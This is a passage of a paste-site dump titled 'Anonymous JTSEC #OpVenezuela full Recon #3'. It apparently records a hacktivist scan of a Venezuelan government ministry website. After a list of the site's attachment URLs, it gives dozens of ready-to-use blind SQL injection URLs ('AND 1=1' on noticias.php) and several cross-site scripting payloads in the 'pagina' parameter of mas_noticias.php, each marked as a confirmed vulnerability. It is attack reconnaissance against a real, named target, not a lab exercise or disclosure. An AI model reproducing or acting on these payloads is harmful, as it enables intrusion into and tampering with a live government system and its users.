  1655. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia751_1.
  1656. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia751_1.
  1657. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia459_1.
  1658. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia801_1.
  1659. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia826_1.
  1660. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia1114_1.
  1661. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia459_1.
  1662. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia793_1.
  1663. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo79_1.
  1664. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo79_1.
  1665. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo118_1.
  1666. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia826_1.
  1667. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia927_1.
  1668. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia1110_1.
  1669. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia413_1.
  1670. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia806_1.
  1671. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia1114_1.
  1672. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia801_1.
  1673. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo118_1.
  1674. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia413_1.
  1675. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Consultar_t_noticia_RegistrosCargadosBDD/adjunto_t_noticia806_1.
  1676. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia803_1.
  1677. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia806_1.
  1678. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia806_1.
  1679. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia803_1.
  1680. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia927_1.
  1681. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia644_1.
  1682. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo119_1.
  1683. | http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_cintillo_RegistrosCarga/adjunto_t_cintillo119_1.
  1684. ######################################################################################################################################
  1685. | Blind SQL Injection:
  1686. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1585+AND+1=1
  1687. | [+] Keyword: inicia
  1688. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1587+AND+1=1
  1689. | [+] Keyword: Publican
  1690. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1583+AND+1=1
  1691. | [+] Keyword: depositan
  1692. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1584+AND+1=1
  1693. | [+] Keyword: partir
  1694. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1586+AND+1=1
  1695. | [+] Keyword: Presentar�n
  1696. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1580+AND+1=1
  1697. | [+] Keyword: adquisitivo
  1698. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1581+AND+1=1
  1699. | [+] Keyword: Pr�ximo
  1700. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1582+AND+1=1
  1701. | [+] Keyword: Gobierno
  1702. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1587+AND+1=1
  1703. | [+] Keyword: Publican
  1704. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1586+AND+1=1
  1705. | [+] Keyword: Presentar�n
  1706. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1585+AND+1=1
  1707. | [+] Keyword: inicia
  1708. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1583+AND+1=1
  1709. | [+] Keyword: depositan
  1710. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1584+AND+1=1
  1711. | [+] Keyword: partir
  1712. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1577+AND+1=1
  1713. | [+] Keyword: Maduro
  1714. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1576+AND+1=1
  1715. | [+] Keyword: Empresarios
  1716. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1575+AND+1=1
  1717. | [+] Keyword: Agenda
  1718. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1574+AND+1=1
  1719. | [+] Keyword: felicita
  1720. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1573+AND+1=1
  1721. | [+] Keyword: reconoce
  1722. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1572+AND+1=1
  1723. | [+] Keyword: Bolivariano
  1724. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1571+AND+1=1
  1725. | [+] Keyword: quinta
  1726. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1567+AND+1=1
  1727. | [+] Keyword: afinan
  1728. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1566+AND+1=1
  1729. | [+] Keyword: trabajo
  1730. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1565+AND+1=1
  1731. | [+] Keyword: Ahorro
  1732. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1564+AND+1=1
  1733. | [+] Keyword: nacional
  1734. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1562+AND+1=1
  1735. | [+] Keyword: escolarizaci�n
  1736. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1561+AND+1=1
  1737. | [+] Keyword: venezolanos
  1738. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1557+AND+1=1
  1739. | [+] Keyword: Pensionados
  1740. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1563+AND+1=1
  1741. | [+] Keyword: detenidos
  1742. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1555+AND+1=1
  1743. | [+] Keyword: obrera
  1744. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1554+AND+1=1
  1745. | [+] Keyword: atendido
  1746. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1517+AND+1=1
  1747. | [+] Keyword: ahorro
  1748. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1515+AND+1=1
  1749. | [+] Keyword: inspeccionando
  1750. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1513+AND+1=1
  1751. | [+] Keyword: petros
  1752. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1514+AND+1=1
  1753. | [+] Keyword: Presidente
  1754. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1510+AND+1=1
  1755. | [+] Keyword: Vicepresidencia
  1756. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1512+AND+1=1
  1757. | [+] Keyword: Vicepresidenta
  1758. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1511+AND+1=1
  1759. | [+] Keyword: instalado
  1760. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1527+AND+1=1
  1761. | [+] Keyword: Plataforma
  1762. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1526+AND+1=1
  1763. | [+] Keyword: William
  1764. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1525+AND+1=1
  1765. | [+] Keyword: Presidente
  1766. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1523+AND+1=1
  1767. | [+] Keyword: Grupos
  1768. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1524+AND+1=1
  1769. | [+] Keyword: Sudeban
  1770. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1522+AND+1=1
  1771. | [+] Keyword: Presidente
  1772. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1520+AND+1=1
  1773. | [+] Keyword: cumplen
  1774. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1521+AND+1=1
  1775. | [+] Keyword: increment�
  1776. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=38+AND+1=1
  1777. | [+] Keyword: Comisi�n
  1778. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=39+AND+1=1
  1779. | [+] Keyword: Misi�n
  1780. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=37+AND+1=1
  1781. | [+] Keyword: adecuaci�n
  1782. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1495+AND+1=1
  1783. | [+] Keyword: Presidente
  1784. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1506+AND+1=1
  1785. | [+] Keyword: Gobierno
  1786. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1505+AND+1=1
  1787. | [+] Keyword: venezolanos
  1788. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1504+AND+1=1
  1789. | [+] Keyword: Presidente
  1790. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1582+AND+1=1
  1791. | [+] Keyword: Gobierno
  1792. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1581+AND+1=1
  1793. | [+] Keyword: Pr�ximo
  1794. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1580+AND+1=1
  1795. | [+] Keyword: adquisitivo
  1796. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1485+AND+1=1
  1797. | [+] Keyword: Congreso
  1798. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1484+AND+1=1
  1799. | [+] Keyword: Econ�mico
  1800. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve//web-final/noticias.php?id_noticia_busqueda=1483+AND+1=1
  1801. | [+] Keyword: P�blica
  1802. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1577+AND+1=1
  1803. | [+] Keyword: Maduro
  1804. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1576+AND+1=1
  1805. | [+] Keyword: Empresarios
  1806. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1575+AND+1=1
  1807. | [+] Keyword: Agenda
  1808. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1574+AND+1=1
  1809. | [+] Keyword: felicita
  1810. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1573+AND+1=1
  1811. | [+] Keyword: reconoce
  1812. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1572+AND+1=1
  1813. | [+] Keyword: Bolivariano
  1814. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1571+AND+1=1
  1815. | [+] Keyword: quinta
  1816. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1570+AND+1=1
  1817. | [+] Keyword: Miraflores
  1818. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1567+AND+1=1
  1819. | [+] Keyword: afinan
  1820. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1566+AND+1=1
  1821. | [+] Keyword: trabajo
  1822. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1565+AND+1=1
  1823. | [+] Keyword: Ahorro
  1824. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1564+AND+1=1
  1825. | [+] Keyword: nacional
  1826. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=39+AND+1=1
  1827. | [+] Keyword: Misi�n
  1828. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=38+AND+1=1
  1829. | [+] Keyword: Comisi�n
  1830. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=37+AND+1=1
  1831. | [+] Keyword: adecuaci�n
  1832. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1547+AND+1=1
  1833. | [+] Keyword: Presidente
  1834. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1546+AND+1=1
  1835. | [+] Keyword: Compra
  1836. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1545+AND+1=1
  1837. | [+] Keyword: SUDEBAN
  1838. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1544+AND+1=1
  1839. | [+] Keyword: C�mara
  1840. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1557+AND+1=1
  1841. | [+] Keyword: Pensionados
  1842. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1555+AND+1=1
  1843. | [+] Keyword: obrera
  1844. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1554+AND+1=1
  1845. | [+] Keyword: atendido
  1846. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1553+AND+1=1
  1847. | [+] Keyword: Pueblo
  1848. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1552+AND+1=1
  1849. | [+] Keyword: Activan
  1850. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1551+AND+1=1
  1851. | [+] Keyword: Presidente
  1852. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1536+AND+1=1
  1853. | [+] Keyword: Contin�an
  1854. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1537+AND+1=1
  1855. | [+] Keyword: Consolidan
  1856. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1535+AND+1=1
  1857. | [+] Keyword: acu�ar�
  1858. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1534+AND+1=1
  1859. | [+] Keyword: remesas
  1860. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1533+AND+1=1
  1861. | [+] Keyword: F�brica
  1862. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1527+AND+1=1
  1863. | [+] Keyword: Plataforma
  1864. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1526+AND+1=1
  1865. | [+] Keyword: William
  1866. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1525+AND+1=1
  1867. | [+] Keyword: Presidente
  1868. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1524+AND+1=1
  1869. | [+] Keyword: Sudeban
  1870. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1523+AND+1=1
  1871. | [+] Keyword: Grupos
  1872. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1522+AND+1=1
  1873. | [+] Keyword: Presidente
  1874. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1521+AND+1=1
  1875. | [+] Keyword: increment�
  1876. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1506+AND+1=1
  1877. | [+] Keyword: Gobierno
  1878. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1505+AND+1=1
  1879. | [+] Keyword: venezolanos
  1880. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1504+AND+1=1
  1881. | [+] Keyword: Presidente
  1882. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1503+AND+1=1
  1883. | [+] Keyword: Consejos
  1884. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1502+AND+1=1
  1885. | [+] Keyword: Afinan
  1886. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1501+AND+1=1
  1887. | [+] Keyword: Vicepresidente
  1888. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1517+AND+1=1
  1889. | [+] Keyword: ahorro
  1890. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1513+AND+1=1
  1891. | [+] Keyword: petros
  1892. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1515+AND+1=1
  1893. | [+] Keyword: inspeccionando
  1894. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1514+AND+1=1
  1895. | [+] Keyword: Presidente
  1896. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1512+AND+1=1
  1897. | [+] Keyword: Vicepresidenta
  1898. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1510+AND+1=1
  1899. | [+] Keyword: Vicepresidencia
  1900. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1511+AND+1=1
  1901. | [+] Keyword: instalado
  1902. | [+] Vul [Blind SQL-i]: http://minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1509+AND+1=1
  1903. | [+] Keyword: Presidente
  1904. ######################################################################################################################################
  1905. | Cross-Site Scripting (XSS):
  1906. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<IMG SRC="javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1907. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<script>alert('XSS')</script>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1908. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1909. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1910. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1911. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<body onload="javascript:alert('XSS')"></body>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1912. | [+] Vul [XSS] http://minppibes.gob.ve//web-final/mas_noticias.php?pagina=<table background="javascript:alert('XSS')"></table>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1913. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1914. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<script>alert('XSS')</script>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1915. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<IMG SRC="javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1916. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1917. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1918. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<body onload="javascript:alert('XSS')"></body>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1919. | [+] Vul [XSS] http://minppibes.gob.ve/web-final/mas_noticias.php?pagina=<table background="javascript:alert('XSS')"></table>&fecha_busqueda=&id_autor_publicacion=&id_estado=
  1920. =======================================================================================================================================
  1921. #######################################################################################################################################
  1922. Anonymous JTSEC #OpVenezuela full Recon #3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement